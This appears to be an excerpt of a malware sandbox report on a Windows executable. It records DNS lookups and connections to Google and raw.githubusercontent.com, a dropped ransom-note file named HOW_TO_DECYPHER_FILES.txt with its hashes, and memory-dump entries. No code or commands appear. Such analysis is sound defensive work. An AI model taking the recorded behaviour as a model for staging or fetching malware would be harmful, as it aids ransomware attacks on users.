                                                              HTTP/1.1 429 Too Many Requests
                                                              Date: Sat, 14 Dec 2024 09:32:47 GMT
                                                              Pragma: no-cache
                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Content-Type: text/html
                                                              Server: HTTP server (unknown)
                                                              Content-Length: 3078
                                                              X-XSS-Protection: 0
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            • 172.217.20.164:443
                                                              https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                              tls, http
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              1.1kB
                                                              10.0kB
                                                              11
                                                              14

                                                              HTTP Request

                                                              GET https://www.google.com/

                                                              HTTP Response

                                                              302

                                                              HTTP Request

                                                              GET https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

                                                              HTTP Response

                                                              429
                                                            • 185.199.109.133:443
                                                              raw.githubusercontent.com
                                                              tls
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              359 B
                                                              219 B
                                                              5
                                                              5
                                                            • 8.8.8.8:53
                                                              www.google.com
                                                              dns
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              60 B
                                                              76 B
                                                              1
                                                              1

                                                              DNS Request

                                                              www.google.com

                                                              DNS Response

                                                              172.217.20.164

                                                            • 8.8.8.8:53
                                                              raw.githubusercontent.com
                                                              dns
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              71 B
                                                              135 B
                                                              1
                                                              1

                                                              DNS Request

                                                              raw.githubusercontent.com

                                                              DNS Response

                                                              185.199.109.133
                                                              185.199.110.133
                                                              185.199.108.133
                                                              185.199.111.133

                                                            MITRE ATT&CK Enterprise v15

                                                            Downloads

                                                            • C:\HOW_TO_DECYPHER_FILES.txt

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              7ca69eac5cd42ef8d58d1078e64e1df9

                                                              SHA1

                                                              53b63384f9c2b74fea41b97187c69e2a5cfc985a

                                                              SHA256

                                                              904571e7b01a1508e3f69aec06a49c71c8a6423a109503145869921c5685a60b

                                                              SHA512

                                                              6ab9965548b6c166a2e1052e2d1755f1dc021d91a4494041ce92e5777537a15e741280a328f883eec644d9d500dd1bc2aa16a3fcb06c973d9cb4fc2670540bbb

                                                            • memory/2508-0-0x00000000749EE000-0x00000000749EF000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/2508-1-0x00000000009B0000-0x00000000009CC000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/2508-2-0x00000000749E0000-0x00000000750CE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            • memory/2508-106-0x00000000749E0000-0x00000000750CE000-memory.dmp

                                                              Filesize

                                                              6.9MB
